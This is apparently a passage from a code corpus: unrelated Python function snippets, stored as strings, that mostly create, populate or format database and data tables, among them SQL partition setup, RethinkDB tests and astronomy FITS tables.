DICT_AIN[i][0],\n DICT_AIN[i][1]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR FSR------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | FSR |\")\n for i in range(6):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_FSR[i]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR RATE------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | RATE |\")\n for i in range(8):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_RATE[i].rjust(7, ' ')))\n print(\"--------------------------------------\")", "def _create_intermediate_delta_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {blacklist_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname),\n blacklist_delta_tbl=sql.Identifier(self._blacklist_tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_delta_tblname\n notifications_delta_tbl = sql.Identifier(self._notifications_lists_tblname)\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {notifications_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n notifications_delta_tbl=notifications_delta_tbl))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_delta_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {exceptions_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n exceptions_delta_tbl=sql.Identifier(self._exceptions_lists_tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_delta_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def __init__(self, engine: Engine, spec_id: int):\n\n self.engine = engine\n self.data = engine.get_spec(spec_id)\n assert self.data is not None\n\n # build the talent rows\n self.talent_rows = {}\n self.levels = {}\n for tier_data in self.data[\"talent_tiers\"]:\n # store talents as one-indexed\n talent_row = {}\n for talent_data in tier_data[\"talents\"]:\n ttip = talent_data[\"spell_tooltip\"]\n f_str = \"({}, {}) {}\".format(\n talent_data[\"talent\"][\"name\"],\n ttip[\"cast_time\"],\n ttip[\"description\"],\n )\n talent_row[talent_data[\"column_index\"] + 1] = {\n \"text\": f_str,\n \"raw\": talent_data,\n }\n\n # save tiers as one-indexed\n index = level_to_index(tier_data[\"level\"])\n self.talent_rows[index] = talent_row\n self.levels[index] = tier_data[\"level\"]\n\n # store this spec's talent macros\n self.macros = {}\n for row_idx, row_data in self.talent_rows.items():\n macro = build_row_macro(row_idx, row_data)\n if macro is not None:\n self.macros[row_idx] = macro\n\n self.name = self.data[\"name\"]\n\n # build a data structure for serialization\n media = engine.get_spec_media(spec_id)\n assert media is not None\n self.to_serialize = {\n \"icon\": media[\"assets\"][0][\"value\"],\n \"name\": self.name,\n \"slug\": self.name.lower().replace(\" \", \"_\"),\n \"role\": self.data[\"role\"][\"name\"],\n \"has_macros\": bool(self.macros),\n }\n self.to_serialize[\"talent_rows\"] = []\n for row, data in self.talent_rows.items():\n rdata: dict = {\n \"index\": row,\n \"level\": self.levels[row],\n \"macro\": None,\n }\n if row in self.macros:\n rdata[\"macro\"] = self.macros[row][0]\n rdata[\"macro_lines\"] = self.macros[row][1]\n rdata[\"talents\"] = {}\n for talent_idx, talent_data in data.items():\n tdata = Talent(\n self.engine, talent_data[\"raw\"][\"talent\"][\"id\"]\n ).to_serialize\n tdata[\"active\"] = is_talent_active(talent_data[\"raw\"])\n rdata[\"talents\"][talent_idx] = tdata\n self.to_serialize[\"talent_rows\"].append(rdata)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def test_create_table(self):\r\n function_name = sys._getframe().f_code.co_name\r\n db_name = \"{}_{}\".format(function_name, \"db\")\r\n db_name_illegal_by_rdb = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n db_name_illegal_by_this_program = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n table_name = \"{}_{}\".format(function_name, \"table\")\r\n table_name_illegal_by_rdb = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n table_name_illegal_by_this_program = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n\r\n test_list_1 = [\r\n db_name,\r\n table_name,\r\n None,\r\n None,\r\n None,\r\n None\r\n ]\r\n test_list_2 = [\r\n db_name,\r\n table_name_illegal_by_rdb,\r\n None\r\n ]\r\n test_list_3 = [\r\n db_name,\r\n table_name_illegal_by_this_program,\r\n None\r\n ]\r\n test_list_4 = [\r\n db_name_illegal_by_rdb,\r\n table_name,\r\n None\r\n ]\r\n test_list_5 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_rdb,\r\n None\r\n ]\r\n test_list_6 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_this_program,\r\n None\r\n ]\r\n test_list_7 = [\r\n db_name_illegal_by_this_program,\r\n table_name,\r\n None\r\n ]\r\n test_list_8 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_rdb,\r\n None\r\n ]\r\n test_list_9 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_this_program,\r\n None\r\n ]\r\n\r\n crd(self.c, test_list_1[0])\r\n test_list_1[len(test_list_1) - 1] = isinstance(\r\n crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0],\r\n True\r\n ),\r\n r.ast.TableCreate\r\n )\r\n test_list_1[len(test_list_1) - 2] = crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0]\r\n )\r\n test_list_1[len(test_list_1) - 3] = crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0]\r\n )\r\n test_list_1[len(test_list_1) - 4] = isinstance(\r\n crt(\r\n self.c,\r\n test_list_1[1],\r\n test_list_1[0],\r\n True\r\n ),\r\n r.ast.TableCreate\r\n )\r\n dd(self.c, test_list_1[0])\r\n\r\n crd(self.c, test_list_2[0])\r\n \"\"\"Test 1.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_2[len(test_list_2) - 1] = crt(\r\n self.c,\r\n test_list_2[1],\r\n test_list_2[0]\r\n )\r\n dd(self.c, test_list_2[0])\r\n\r\n crd(self.c, test_list_3[0])\r\n \"\"\"Test 2.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_3[len(test_list_3) - 1] = crt(\r\n self.c,\r\n test_list_3[1],\r\n test_list_3[0]\r\n )\r\n dd(self.c, test_list_3[0])\r\n\r\n \"\"\"Test 3.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_4[len(test_list_4) - 1] = crt(\r\n self.c,\r\n test_list_4[1],\r\n test_list_4[0]\r\n )\r\n\r\n \"\"\"Test 4.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_5[len(test_list_5) - 1] = crt(\r\n self.c,\r\n test_list_5[1],\r\n test_list_5[0]\r\n )\r\n\r\n \"\"\"Test 5.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_6[len(test_list_6) - 1] = crt(\r\n self.c,\r\n test_list_6[1],\r\n test_list_6[0]\r\n )\r\n\r\n r.db_create(test_list_7[0]).run(self.c)\r\n \"\"\"Test 6.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_7[len(test_list_7) - 1] = crt(\r\n self.c,\r\n test_list_7[1],\r\n test_list_7[0]\r\n )\r\n r.db_drop(test_list_7[0]).run(self.c)\r\n\r\n r.db_create(test_list_8[0]).run(self.c)\r\n \"\"\"Test 7.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_8[len(test_list_8) - 1] = crt(\r\n self.c,\r\n test_list_8[1],\r\n test_list_8[0]\r\n )\r\n r.db_drop(test_list_8[0]).run(self.c)\r\n\r\n r.db_create(test_list_9[0]).run(self.c)\r\n \"\"\"Test 8.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_9[len(test_list_9) - 1] = crt(\r\n self.c,\r\n test_list_9[1],\r\n test_list_9[0]\r\n )\r\n r.db_drop(test_list_9[0]).run(self.c)\r\n\r\n self.assertTrue(test_list_1[len(test_list_1) - 1]) # Test 9.\r\n self.assertIsNotNone(test_list_1[len(test_list_1) - 2]) # Test 10.\r\n self.assertIsNone(test_list_1[len(test_list_1) - 3]) # Test 11.\r\n self.assertFalse(test_list_1[len(test_list_1) - 4]) # Test 12.\r\n self.assertIsNone(test_list_2[len(test_list_2) - 1]) # Test 13.\r\n self.assertIsNone(test_list_3[len(test_list_3) - 1]) # Test 14.\r\n self.assertIsNone(test_list_4[len(test_list_4) - 1]) # Test 15.\r\n self.assertIsNone(test_list_5[len(test_list_5) - 1]) # Test 16.\r\n self.assertIsNone(test_list_6[len(test_list_6) - 1]) # Test 17.\r\n self.assertIsNone(test_list_7[len(test_list_7) - 1]) # Test 18.\r\n self.assertIsNone(test_list_8[len(test_list_8) - 1]) # Test 19.\r\n self.assertIsNone(test_list_9[len(test_list_9) - 1]) # Test 20.\r", "def init_tables(database_url, _metadata, checkfirst=True):\n import dpds.storages.db.tables.operations\n import dpds.storages.db.tables.block\n import dpds.storages.db.tables.meta\n with isolated_nullpool_engine(database_url) as engine:\n _metadata.create_all(bind=engine, checkfirst=checkfirst)", "def startup(self):\n self.load_up_initial_db(TIMESTAMP_PARSE_DICT)\n self.add_numeric_cols()", "def fill_table(info):\n # extrac attributes from info struct\n data = info[\"data\"]\n table = info[\"table\"]\n header = info[\"header\"]\n row_num = info[\"row_num\"]\n\n currency_type_num = row_num - 1\n row_index = 0\n col_index = 0\n i = 0\n while i < len(data):\n if data[i].find(\"%\") > 0:\n # stat data\n while i < len(data) and row_index < currency_type_num:\n table[row_index+1].append(data[i])\n row_index += 1\n i += 1\n # Reset row_index\n row_index = 0\n else:\n if i < row_num - 1:\n # currency Type\n table[i+1].append(data[i])\n else:\n # time marker\n if data[i] != header:\n table[0].append(data[i])\n i += 1\n\n # End loop\n return None", "def construct_table(self):\n table_str = self.header_row\n row_lbls, col_lbls = self.get_idxvals()\n for r,rlbl in enumerate(row_lbls):\n row_data = [self.data[rlbl,clbl] for clbl in col_lbls]\n table_str += self.construct_row(r, row_data)\n \n return table_str", "def __init__(self, **kwargs):\n TableLoader.__init__(self, **kwargs)\n \n self._top_level_categories_ = ['Mathematics',\n 'People',\n 'Science',\n 'Law',\n 'History',\n 'Culture',\n 'Politics',\n 'Technology',\n 'Education',\n 'Health',\n 'Business',\n 'Belief',\n 'Humanities',\n 'Society',\n 'Life',\n 'Environment',\n 'Computers',\n 'Arts',\n 'Language',\n 'Places']", "def add_run_length_encoding_table(self, tag, line, rows, columns, row_labels=None, underline=False):\n if row_labels:\n columns += 1\n\n with tag(\"table\"):\n with tag(\"tbody\"):\n for row_index in range(rows):\n with tag(\"tr\"):\n for column_index in range(columns):\n line(\"td\", \"\", klass=\"bordered-cell\")\n if row_labels and row_index < len(row_labels):\n line(\"td\", row_labels[row_index], klass=\"label-cell\")\n if underline:\n line(\"td\", \"\", klass=\"padding-cell\")\n line(\"td\", \"\", klass=\"underline-cell\")", "def create_tables (cls, env=os.environ):\n\n cur = cls.pri_table_read_cursor (env=env)\n cur.execute ('SPECIALCASE gettablelist')\n ret = cur.fetchall ()\n \n existingtables = set ([x[0].lower() for x in ret])\n\n for tabname in (set (cls.table_desc.keys ()) - existingtables):\n sql, lsd = cls.table_desc[tabname]\n epls, desls, sqlprefix = lsd.get_create_labeling (savels=True)\n\n conn = get_labeled_conn (epls, desls)\n cur = conn.cursor ()\n cur.execute (sql)\n conn.close ()\n lsd.pop_labelset ()\n\n \n import psycopg2\n for sql in cls.sql_createindex:\n conn = get_labeled_conn ()\n cur = conn.cursor ()\n # XXX It would be better to check which indices exist as we do for tables.\n try:\n cur.execute (sql)\n except psycopg2.ProgrammingError, e: \n pass\n conn.close ()", "def __init__(self, dim, connections_per_row=3):\n _table.STable_swiginit(self, _table.new_STable(dim, connections_per_row))", "def __init__(self):\n _snap.TTableRow_swiginit(self, _snap.new_TTableRow())", "def __init__(self, tabletext=\"\"):\n\n # Table attributes\n self.__title = \"\"\n self.__type = \"GRAPHS\" # Default to GRAPHS\n self.__graphs = \"\"\n self.__columns = \"\"\n self.__text = \"\"\n self.__data = \"\"\n # Derived data\n self.__graph_list = []\n self.__column_list = []\n # Indicate the the object has been populated\n self.__table_parse_error = False\n self.__nonzero = False\n # The \"raw\" table data from the log file\n self.__rawtable = \"\"\n # Attempt to populate the table\n if tabletext:\n self.__rawtable = tabletext\n if not self.__buildtable(tabletext):\n # Failed to extract table\n # If it could be a title then use this\n # instead\n if str(tabletext).count(\"\\n\") == 0:\n self.settitle(tabletext)", "def load_table(self, fpath, string, dom, mmap, step_length=None):\n single_dom_spec = True\n if isinstance(string, basestring):\n string = string.strip().lower()\n if string == 'ic':\n string = STR_IC\n elif string == 'dc':\n string = STR_DC\n elif string == 'all':\n string = STR_ALL\n else:\n raise ValueError('Unhandled string \"{}\"'.format(string))\n agg_mode = AGG_STR_ALL if string is STR_ALL else AGG_STR_SUBDET\n if self.string_aggregation is None:\n self.string_aggregation = agg_mode\n assert agg_mode == self.string_aggregation\n single_dom_spec = False\n else:\n if self.string_aggregation is None:\n self.string_aggregation = False\n # `False` is ok but `None` is not ok\n assert self.string_aggregation == False # pylint: disable=singleton-comparison\n assert 1 <= string <= 86\n\n if isinstance(dom, basestring):\n dom = dom.strip().lower()\n assert dom == 'all'\n dom = DOM_ALL\n if self.depth_aggregation is None:\n self.depth_aggregation = True\n assert self.depth_aggregation\n single_dom_spec = False\n else:\n if self.depth_aggregation is None:\n self.depth_aggregation = False\n # `False` is ok but `None` is not ok\n assert self.depth_aggregation == False # pylint: disable=singleton-comparison\n assert 1 <= dom <= 60\n\n if single_dom_spec and not self.operational_doms[string - 1, dom - 1]:\n print(\n 'WARNING: String {}, DOM {} is not operational, skipping'\n ' loading the corresponding table'.format(string, dom)\n )\n return\n\n table = self.table_loader_func(fpath=fpath, mmap=mmap)\n if 'step_length' in table:\n if step_length is None:\n step_length = table['step_length']\n else:\n assert step_length == table['step_length']\n else:\n assert step_length is not None\n table['step_length'] = step_length\n\n table_norm, t_indep_table_norm = get_table_norm(\n avg_angsens=self.avg_angsens,\n quantum_efficiency=1,\n norm_version=self.norm_version,\n **{k: table[k] for k in TABLE_NORM_KEYS}\n )\n table['table_norm'] = table_norm\n table['t_indep_table_norm'] = t_indep_table_norm\n\n pexp_5d, pexp_meta = generate_pexp_5d_function(\n table=table,\n table_kind=self.table_kind,\n compute_t_indep_exp=self.compute_t_indep_exp,\n use_directionality=self.use_directionality,\n num_phi_samples=self.num_phi_samples,\n ckv_sigma_deg=self.ckv_sigma_deg\n )\n if self.pexp_func is None:\n self.pexp_func = pexp_5d\n self.pexp_meta = pexp_meta\n elif pexp_meta != self.pexp_meta:\n raise ValueError(\n 'All binnings and table parameters currently must be equal to'\n ' one another.'\n )\n\n table_tup = (\n table[self.table_name][self.usable_table_slice],\n table['table_norm'],\n )\n\n if self.tbl_is_templ_compr:\n table_tup += (table['table_map'],)\n\n if self.compute_t_indep_exp:\n table_tup += (\n table[self.t_indep_table_name],\n table['t_indep_table_norm']\n )\n if self.tbl_is_templ_compr:\n table_tup += (table['t_indep_table_map'],)\n\n self.tables[(string, dom)] = table_tup", "def _populate(self):\n\n # Assume the first word is what we want, and we can find well formed years\n # This sucks, but will work for these ones.\n # Roll on bibtex for citations in the CIM.\n\n citation_detail = self.doc.citation_detail\n author = citation_detail.split(',')[0]\n match = '([^\\w])19|20\\d\\d([^\\w])*?'\n m = re.search(match, citation_detail)\n if m:\n year = m.group(0)\n else:\n year = None\n\n # one error in existing es-doc content to be fixed:\n if 'van Vuuren DP' in author:\n author = 'van Vuuren'\n print 'applying vv fix'\n\n self.year = int(year)\n\n # We assume that this table will have entries which ne\n\n # I use the first three letters of a an authors name, and for\n # three or more authors, EA, and then the year for my bibtex citation string\n self.citeguess = author[0:3] + 'EA' + year[2:]\n # This is what will appear in the table:\n self.citestring = '%s et al. (%s)' % (author, year)\n # Keep this for a reference list for checking against the eventual bibtex reference list.\n self.text = citation_detail", "def create_tables(self):\n for name, attribute in self.__dict__.items():\n if hasattr(attribute, 'create_table_in_sqlite_db'):\n attribute.create_table_in_sqlite_db()", "def _buildtable(self):\n\n tabrows = []\n\n for i, (expid, exfiles) in enumerate(self._exposure_files.items()):\n specflux_b, specflux_r, specflux_z = [], [], []\n tab = None\n\n if len(exfiles) == 0:\n continue\n\n print(expid)\n for exfile in exfiles:\n print(exfile)\n hdu = fits.open(exfile)\n\n # The following tables are present in the redux sframes and the\n # nightwatch qcframes.\n wave = hdu['WAVELENGTH'].data\n\n # However, in the nightwatch files the wavelength data are a\n # table of size nfiber x nwavelength.\n if self._filetype == 'nightwatch':\n if wave.ndim > 1:\n wave = wave[0]\n\n fluxhead = hdu['FLUX'].header\n fluxdata = hdu['FLUX'].data\n ivardata = hdu['IVAR'].data\n fibermap = hdu['FIBERMAP'].data\n exptime = fluxhead['EXPTIME']\n if not np.all(self._unditherfa['FIBER'] ==\n np.arange(len(self._unditherfa))):\n raise ValueError('weird fiberassign file format!')\n fibermap = self._unditherfa[fibermap['FIBER']]\n\n target_id = fibermap['TARGETID']\n target_ra = fibermap['TARGET_RA']\n target_dec = fibermap['TARGET_DEC']\n fiber = fibermap['FIBER']\n objtype = fibermap['OBJTYPE']\n flux_g = fibermap['FLUX_G']\n flux_r = fibermap['FLUX_R']\n flux_z = fibermap['FLUX_Z']\n x, y = [fibermap['FIBERASSIGN_{}'.format(val)] for val in ('X', 'Y')]\n\n camera = fluxhead['CAMERA'][0].upper()\n\n if getattr(self, '_deltara', None) is not None:\n dra = self._deltara[i]*np.ones(len(fiber))\n ddec = self._deltadec[i]*np.ones(len(fiber))\n elif self._dithertype == 'telescope':\n dithra = self._ditherfa['target_ra']\n dithdec = self._ditherfa['target_dec']\n udithra = self._unditherfa['target_ra']\n udithdec = self._unditherfa['target_dec']\n ontarget = ((self._ditherfa['targetid'] ==\n self._unditherfa['targetid']) &\n (self._ditherfa['objtype'] == 'TGT'))\n dfiberra = (dithra-udithra)*np.cos(np.radians(udithdec))*60*60\n dfiberdec = (dithdec-udithdec)*60*60\n if not np.all(self._ditherfa['FIBER'] ==\n np.arange(len(self._ditherfa))):\n raise ValueError('unexpected shape of dither file')\n dfiberra[~ontarget] = np.nan\n dfiberdec[~ontarget] = np.nan\n dfiberra = dfiberra[fiber]\n dfiberdec = dfiberdec[fiber]\n wcs = self.lookup_wcs(fluxhead['MJD-OBS'])\n centralwcs = self._central_wcs\n if (~np.isfinite(centralwcs['cenra'][1]) or\n ~np.isfinite(centralwcs['cendec'][1])):\n raise ValueError('central pointing ra/dec is NaN!')\n dtelra = (wcs['cenra'][1]-centralwcs['cenra'][1])\n dtelra *= np.cos(np.radians(centralwcs['cendec'][1]))\n dteldec = wcs['cendec'][1]-centralwcs['cendec'][1]\n dra = dfiberra + dtelra*60*60\n ddec = dfiberdec + dteldec*60*60\n if np.all(~np.isfinite(dra)):\n print('warning: no good telescope offset for %s' %\n exfile)\n else:\n raise ValueError('not implemented')\n \n for j, fiber_id in enumerate(fiber):\n flux = fluxdata[j]\n ivar = ivardata[j]\n if not np.any(ivar > 0):\n specflux = 0\n specflux_ivar = 0\n else:\n meanivar = np.mean(ivar[ivar > 0])\n mask = ivar > meanivar / 100\n specflux = np.trapz(flux*mask, wave)\n specflux_ivar = 1./np.sum(ivar[mask]**-1)\n # Schlegel: sum over correct wavelengths, all three\n # filters, plus 11 pixel median filter to reject\n # cosmics.\n # will require being better about reading in\n # the spectrographs together.\n tabrows.append((expid, exptime,\n target_id[j], target_ra[j], target_dec[j],\n fiber[j], objtype[j],\n flux_g[j], flux_r[j], flux_z[j],\n specflux, specflux_ivar, camera,\n dra[j], ddec[j],\n x[j], y[j]))\n\n tab = Table(rows=tabrows,\n names=('EXPID', 'EXPTIME',\n 'TARGETID', 'TARGET_RA', 'TARGET_DEC',\n 'FIBER', 'OBJTYPE',\n 'FLUX_G', 'FLUX_R', 'FLUX_Z',\n 'SPECTROFLUX', 'SPECTROFLUX_IVAR', 'CAMERA',\n 'DELTA_X_ARCSEC', 'DELTA_Y_ARCSEC',\n 'XFOCAL', 'YFOCAL'),\n meta={'EXTNAME' : 'DITHER',\n 'TILEID' : '{}'.format(self._tileid)})\n\n return tab", "def descr2tabledef(descr, table_type='binary', write_bitcols=False):\n names = []\n formats = []\n dims = []\n\n for d in descr:\n\n \"\"\"\n npy_dtype = d[1][1:]\n if is_ascii and npy_dtype in ['u1','i1']:\n raise ValueError(\"1-byte integers are not supported for \"\n \"ascii tables\")\n \"\"\"\n\n if d[1][1] == 'O':\n raise ValueError(\n 'cannot automatically declare a var column without '\n 'some data to determine max len')\n\n name, form, dim = _npy2fits(\n d, table_type=table_type, write_bitcols=write_bitcols)\n\n if name == '':\n raise ValueError(\"field name is an empty string\")\n\n \"\"\"\n if is_ascii:\n if dim is not None:\n raise ValueError(\"array columns are not supported \"\n \"for ascii tables\")\n \"\"\"\n\n names.append(name)\n formats.append(form)\n dims.append(dim)\n\n return names, formats, dims", "def _parse_initsol(self) :\n\t\tlogging.debug(\"Parsing initsol initial solution\")\n\n\t\t# Init initsol as an empty dict\n\t\tself.initsol = {}\n\n\t\tfor varname in ['alpha','beta','g','h'] : \n\t\t\tself._parse_var_initsol(varname)", "def _processSpec(self, spec):\n if isinstance(spec, list):\n for k in spec:\n if isinstance(k, Specifier):\n self._spec.append(k)\n else:\n raise NotAValidSpecifierError(str(type(k)))\n elif isinstance(spec, Specifier):\n self._spec.append(spec)\n else:\n # This point we need to go to the symboltable\n # and look for structs and unions.\n raise NotAValidSpecifierError(str(type(spec)))", "def create_Ih_table(\n experiments, reflections, selections=None, n_blocks=1, anomalous=False\n):\n if selections:\n assert len(selections) == len(\n reflections\n ), \"\"\"Must have an equal number of\n reflection tables and selections in the input lists.\"\"\"\n space_group_0 = experiments[0].crystal.get_space_group()\n for experiment in experiments:\n assert (\n experiment.crystal.get_space_group() == space_group_0\n ), \"\"\"The space\n groups of all experiments must be equal.\"\"\"\n input_tables = []\n indices_lists = []\n for i, reflection in enumerate(reflections):\n if \"inverse_scale_factor\" not in reflection:\n reflection[\"inverse_scale_factor\"] = flex.double(reflection.size(), 1.0)\n if selections:\n input_tables.append(reflection.select(selections[i]))\n indices_lists.append(selections[i].iselection())\n else:\n input_tables.append(reflection)\n indices_lists = None\n Ih_table = IhTable(\n input_tables,\n space_group_0,\n indices_lists,\n nblocks=n_blocks,\n anomalous=anomalous,\n )\n return Ih_table", "def create_tabular_resources(self, file, skip_lines, encoding):\n engine = Engine()\n self.encoding = encoding\n engine.encoding = encoding\n table_val = Table(str(file), header_rows=skip_lines)\n table = engine.auto_create_table(table_val, filename=file, make=False)\n clean_table = table.__dict__\n resource_dict = {}\n path_to_table = os.path.basename(clean_table[\"name\"])\n print(\"Processing... {file_name}\".format(file_name=path_to_table))\n r_name = os.path.splitext(path_to_table)[0].lower()\n resource_dict[\"name\"] = clean_table_name(r_name)\n resource_dict[\"path\"] = path_to_table\n resource_dict[\"schema\"] = {}\n resource_dict[\"dialect\"] = {\"delimiter\": \",\"}\n resource_dict[\"schema\"][\"fields\"] = []\n for cname, ctuple in clean_table[\"columns\"]:\n if len(ctuple) >= 2:\n if ctuple[0] == \"char\":\n # char sizes need quotes\n char_size = \"{a}\".format(a=ctuple[1])\n resource_dict[\"schema\"][\"fields\"].append({\n \"name\": cname,\n \"type\": ctuple[0],\n \"size\": char_size\n })\n else:\n resource_dict[\"schema\"][\"fields\"].append({\n \"name\": cname,\n \"type\": ctuple[0],\n \"size\": ctuple[1]\n })\n else:\n resource_dict[\"schema\"][\"fields\"].append({\n \"name\": cname,\n \"type\": ctuple[0]\n })\n resource_dict[\"url\"] = \"fill\"\n return resource_dict", "def __init__(self, factory, con, name, cols=[]) :\n\n logging.getLogger('main').info('Creating table %s', name)\n\n super().__init__(name)\n self.factory = factory\n self.con = con\n self._extend_cols([('__ROWID', 'INTEGER')])\n self._extend_cols(cols)\n self.row_id = 0\n\n self._create_table()", "def _build_micro_tree_tables(self):\n # A mapping that associates micro tree encoding with its corresponding table.\n self._micro_tables = {}\n\n # A mapping that stores the encoding of each micro tree.\n self._codes = {}\n\n # For every micro tree compute a simle table to answer LA queries.\n for p in self._micro_roots:\n code, f, f_inv = self._encode(p) # encode the micro tree\n self._codes[p.index()] = code, f, f_inv\n if code not in self._micro_tables: # build a simple table if needed\n repr_tree = self._decode(code)\n self._micro_tables[code] = LA_table(repr_tree)", "def preinitialisation(ctx, stmt):\n validmap = {\n u\"module\": [OCLintFunctions.check_module_rawtext],\n u\"submodule\": [OCLintFunctions.check_module_rawtext],\n }\n\n for fn in OCLintStages.map_statement_to_lint_fn(stmt, validmap):\n fn(ctx, stmt)", "def create_row_decoder(self):\n \n self.row_decoder_inst = self.add_inst(name=\"row_decoder\", \n mod=self.row_decoder)\n\n temp = []\n for bit in range(self.addr_size):\n temp.append(\"addr_{0}\".format(bit))\n for row in range(self.num_rows):\n temp.append(\"dec_out_{0}\".format(row))\n temp.extend([\"vdd\", \"gnd\"])\n self.connect_inst(temp)", "def _TableSetup(self):\n global _tablesetup\n global singlestarLocation\n if not _tablesetup:\n singlestar.star_setup(singlestarLocation)\n _tablesetup = True", "def initialize(self):\n self.assmts = {}\n\n bit = 1\n for entry in self.entries:\n assmts = AssignmentList()\n assmts.mask = assmts.bit = bit\n self.assmts[entry] = assmts\n bit <<= 1\n\n for block in self.blocks:\n for stat in block.stats:\n if isinstance(stat, NameAssignment):\n stat.bit = bit\n assmts = self.assmts[stat.entry]\n assmts.stats.append(stat)\n assmts.mask |= bit\n bit <<= 1\n\n for block in self.blocks:\n for entry, stat in block.gen.items():\n assmts = self.assmts[entry]\n if stat is Uninitialized:\n block.i_gen |= assmts.bit\n else:\n block.i_gen |= stat.bit\n block.i_kill |= assmts.mask\n block.i_output = block.i_gen\n for entry in block.bounded:\n block.i_kill |= self.assmts[entry].bit\n\n for assmts in self.assmts.values():\n self.entry_point.i_gen |= assmts.bit\n self.entry_point.i_output = self.entry_point.i_gen", "def __init__(self, str):\n super().__init__(str)\n\n # TODO error mng\n self.internal_code = self.parse_def(str)\n self.table_name = self.extract_tables(str)\n\n print(self.internal2RustStruct())\n print()\n print(self.internal2RustDieselSchema([\"TODO\", \"TODO2\"]))\n print()", "def makeTableFromRows(tableDef, iterator):\n\tt = TableForDef(tableDef)\n\trmk = rscdef.RowmakerDef.makeTransparentFromTable(tableDef\n\t\t).compileForTableDef(tableDef)\n\tfor row in iterator:\n\t\tt.addRow(rmk(row, t))\n\treturn t", "def setUp(self):\n self.db_handler = DynamoDBHandler(ModelTests.TABLE_NAME)\n self.init_table()\n self.items = {}\n self.init_items()\n self.populate_table()", "def _postprocess_arena(self):\n # Create tables\n for i, (offset, rot, half_size, friction, legs) in enumerate(\n zip(self.table_offsets, self.table_rots, self.table_half_sizes, self.table_frictions, self.has_legs)\n ):\n self._add_table(\n name=f\"table{i}\",\n offset=offset,\n rot=rot,\n half_size=half_size,\n friction=friction,\n has_legs=legs,\n )", "def initialize(self):\n self.assmts = {}\n\n offset = 0\n for entry in self.entries:\n assmts = AssignmentList()\n assmts.bit = 1 << offset\n assmts.mask = assmts.bit\n self.assmts[entry] = assmts\n offset += 1\n\n for block in self.blocks:\n block.stats = block.phis.values() + block.stats\n for stat in block.stats:\n if isinstance(stat, (PhiNode, NameAssignment)):\n stat.bit = 1 << offset\n assmts = self.assmts[stat.entry]\n assmts.stats.append(stat)\n assmts.mask |= stat.bit\n offset += 1\n\n for block in self.blocks:\n for entry, stat in block.gen.items():\n assmts = self.assmts[entry]\n if stat is Uninitialized:\n block.i_gen |= assmts.bit\n else:\n block.i_gen |= stat.bit\n block.i_kill |= assmts.mask\n block.i_output = block.i_gen\n for entry in block.bound:\n block.i_kill |= self.assmts[entry].bit\n\n for assmts in self.assmts.itervalues():\n self.entry_point.i_gen |= assmts.bit\n self.entry_point.i_output = self.entry_point.i_gen", "def __init__(self, lzw_min_code_sz, col_table_sz):\n self.code_table = dict()\n clear_code = 1<<lzw_min_code_sz\n eoi_code = clear_code + 1\n self.code_table[clear_code] = [CLEARCODEVAL]\n self.code_table[eoi_code] = [EOICODEVAL]\n for color in range(col_table_sz):\n self.code_table[color] = [color]", "def createCloudinitDataSpec(self, specName, specDesc):\n print('------create 1 linux cloud-init data CustomizationSpec-------')\n cloudinitConfig = CloudinitConfiguration(metadata=self.metadata,\n 